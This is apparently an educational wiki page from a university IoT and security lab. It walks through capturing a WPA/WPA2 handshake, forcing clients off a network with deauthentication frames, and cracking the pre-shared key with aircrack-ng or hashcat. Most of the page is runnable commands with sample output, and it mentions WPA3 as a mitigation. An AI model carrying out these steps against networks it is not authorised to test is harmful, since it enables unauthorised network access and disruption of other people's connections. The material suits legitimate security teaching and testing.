WPA/WPA2 PSK deauthentication attack

From Embedded Lab Vienna for IoT & Security
Jump to: navigation, search

Summary

How to sniff a WPA/WPA2 handshake using a deauthentication attack and crack the Pre-Shared Key (PSK). Aircrack-ng forms a versatile application suite for analyzing and attacking wireless networks but is not the only option in this game. This guide will use GNU/Linux to demonstrate how to use aircrack-ng and macOS to show that this process can be done more efficiently without aircrack-ng. Anyway, these processes can be mixed to get the best process for your situation.

Requirements

Mandatory

GNU/Linux

  • Install aircrack-ng suite: sudo apt install aircrack-ng
Application Description
aircrack-ng 802.11 WEP and WPA/WPA2-PSK key cracking program.
airbase-ng Aimed at attacking clients as opposed to the AP itself.
airdecap-ng Decrypt WEP/WPA/WPA2 capture files.
airdecloak-ng Remove WEP CloakingTM from a packet capture file.
airdrop-ng A rule based wireless deauthication tool.
aireplay-ng Inject and replay wireless frames.
airgraph-ng Graph wireless networks.
airmon-ng Enable and disable monitor mode on wireless interfaces.
airodump-ng Capture raw 802.11 frames.
airolib-ng Precompute WPA/WPA2 passphrases.
airserv-ng Wireless card TCP/IP server to use wit multiple applications.
airtun-ng Virtual tunnel interface creator.
packetforge-ng Create encrypted packets that can be used for injection.

macOS

  • Install Homebrew, the Missing Package Manager for macOS (or Linux): /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
  • Optional: Install aircrack-ng suite: brew install aircrack-ng
  • Install tcpdump: brew install tcpdump
  • Install wireshark to use mergecap: brew install wireshark
  • Enable 'hidden' airport feature: sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

Optional

Hashcat

Background

Problem

Attacks on wireless networks use the advantage that the WLAN protocol (IEEE 802.11) is not encrypted. Only the payload is encrypted. In the case of WPA2, this is usually done using AES. To exploit this weakness, a beacon frame must be intercepted by the hacker to identify the name (BSSID), MAC address (SSID) and channel (radio frequency) of the target access point. Afterwards, this information can be used to sniff packets from that network as desired. To get full access to the network, the WPA2 Pre-shared Key (PSK) is still required. To get it, only 3 steps are necessary, plus some time:

  1. Sniff a beacon management frame containing all information about the network
  2. Sniff a four-way hanshake containing dynamic payload encryption keys
  3. Crack the PSK offline, using data dumps acquired in the previous steps

Note: Intercepting a four-way handshake requires at least one authenticated device on the target network.
Note: The first 2 steps have to be done in range of the target network. The last step takes the longest, but has the advantage that it can be executed anywhere.

Solution

The most recent encryption standard WPA3 is designed to protect against such offline dictionary attacks to guess the password, since an attack has unlimited attempts to guess the PSK by implementing a new key exchange protocol. WPA2 used an imperfect four-way handshake between clients and access points to enable encrypted connections. WPA3 will eliminate this vulnerability in favor of more secure and widely verified simultaneous authentication through equal handshake. Additionally, this new handshake supports forward-secrecy.

Procedure

With aircrack-ng (on GNU/Linux)

Put your interface in monitor mode

  • Use airmon-ng to put interface in monitor mode
  airmon-ng
     PHY	Interface	Driver		Chipset
     phy0	wlan0		iwlwifi		Intel Corporation Wireless 7260 (rev 83)
  • First we need to set interface in monitor mode `iw wlan0 del` and execute the command :
  airmon-ng
  Found phy0 with no interfaces assigned, would you like to assign one to it? [y/n] y
     PHY	Interface	Driver		Chipset
     phy0	wlan0mon	iwlwifi		Intel Corporation Wireless 7260 (rev 83)
  • Kill all processes which use physical device
  airmon-ng check kill
  Killing these processes:
     PID Name
     895 wpa_supplican
  • Start in monitor mode
  airmon-ng start wlan0mon 9

Capture Beacon

  • using wireshark or airodump-ng
  airodump-ng wlan0mon
  • You will need:
    • BSSID (MAC address of access point): <bssid>
    • Access point channel: <channel>
    • MAC address of a victim, wireless client using WPA2

Capture handshake

  • Get handshake or connected station
  airodump-ng -c <channel> --bssid <bssid> -w psk wlan0mon
Warning: With this method, you cannot be sure that a four-way handshake was recorded. See deauthentication attack!

Crack with aircrack-ng

  aircrack-ng -w <passwordlist path> -b  <bssd> psk*.cap

Reset network configuration

Note: Do not forget to turn off monitor mode and restart network manager
  • Stop monitor mode
  airmon-ng stop wlan0mon
  • Restart network manager for internet access
  service network-manager restart

Without aircrack-ng (on macOS)

airport -h
Supported arguments:
 -c[<arg>] --channel=[<arg>]    Set arbitrary channel on the card
 -z        --disassociate       Disassociate from any network
 -I        --getinfo            Print current wireless status, e.g. signal info, BSSID, port type etc.
 -s[<arg>] --scan=[<arg>]       Perform a wireless broadcast scan. 
                                Will perform a directed scan if the optional <arg> is provided
 -x        --xml                Print info as XML
 -P        --psk                Create PSK from specified pass phrase and SSID.
				   The following additional arguments must be specified with this command:
                                  --password=<arg>  Specify a WPA password
                                  --ssid=<arg>      Specify SSID when creating a PSK
 -h        --help               Show this help
Note: airmon-ng, airodump-ng and aireplay-ng don't work on mac.
Note: airport works exclusively on mac.

Capture Beacon

# Scan
sudo airport -s
   SSID     BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
   ▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -72  11      Y  de WPA2     (PSK/AES/AES) 
   ▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -57  1       Y  de WPA2     (PSK/AES/AES) 
   ▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -66  36      Y  de WPA2     (PSK/AES/AES)

Capture Handshake

The Easy way

# Sniff -  Ctrl-C to stop capturing
sudo airport $INTERFACE sniff $CHANNEL
Note: It saves the .cap capture file to /tmp and displays the path plus filename.
Warning: With this method, you cannot be sure that a four-way handshake was recorded. See deauthentication attack!

The Good way

By using airmon-ng or airport a large number of unnecessary packets are captured. Also, you cannot know for sure if a handshake has been intercepted until you manually abort the scan. This process can be improved with tcpdump.

  • Disassociate from any network: (-z --disassociate)
sudo airport -z
  • Set arbitrary channel on the card: (-c[<arg>] --channel=[<arg>])
sudo airport -c$CHANNEL
  • Capture a beacon frame from the AP
sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i $INTERFACE -w beacon.cap
  • Wait for the WPA handshake
sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i $INTERFACE -w handshake.cap
  • Merge the two files
mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap
Warning: With this method, tcpdump will make sure too wait until a four-way handshake was recorded. See deauthentication attack for more information! A beacon should however be captured quite fast.

Crack PSK

The .cap file obtained in the previous steps can only be cracked directly with aircrack-ng. But this can be done more effectively using hashcat (or John the Ripper).

  • Convert .cap to .hcapx file (Part of hashcat-utils)
cap2hccapx capture.cap capture.hccapx
Note: Alternatively, use the tool online: https://hashcat.net/cap2hccapx/
  • Crack using a simple dictionnary attack:

hashcat -m 2500 capture.hccapx wordlist.txt

Note: Refer to the official Hashcat documentation for more examples and variations to crack the PSK.

Deauthentication attack

Use one of the methods below to force devices on the target network, if any, to de-authenticate. When re-authenticating, a four-way handshake is exchanged between the client and the AP, which can be captured easily. The deauthenticated target may only remark a short network disruption, but nothing more.

Warning: Deauther are often mistakenly described as a jammer, even though that is not the case.
Note: A four-way handshake can be analysed with Wireshark, filtering for eapol messages.

Aircrack-ng

aireplay-ng -0 1 -a $BSSID -c $VICTIM_MAC wlan0mon
-0 means deauthentication
1 number of deauthentication frames sent
-a bssid mac address
-c victim mac address to deauthenticate

D-Stike Deauther

D-Stike provides a range of ESP8266 based development board, which come installed with the latest ESP8266 Deauther software developed by Spacehuhn. The source code is availabel on Github. With this software, you can perform different attacks to test WiFi networks. One of them is the deauthentication attack.

Other tools

JamWiFi is a Software with GUI, which allows you to select one or more nearby wireless networks, thereupon presenting a list of clients which are currently active on the network(s). Furthermore, JamWiFi allows you to disconnect clients by performing a deauthentication attack.

Used Hardware

  • Notebook, Ubuntu 18.04 bionic amd64, with Wifi interface card
  • MacBook Pro (15-inch, 2017), macOS 10.14.6, Airport Extreme (Broadcom BCM43xx 1.0)
  • DSTIKE Deauther Watch V1

Courses

References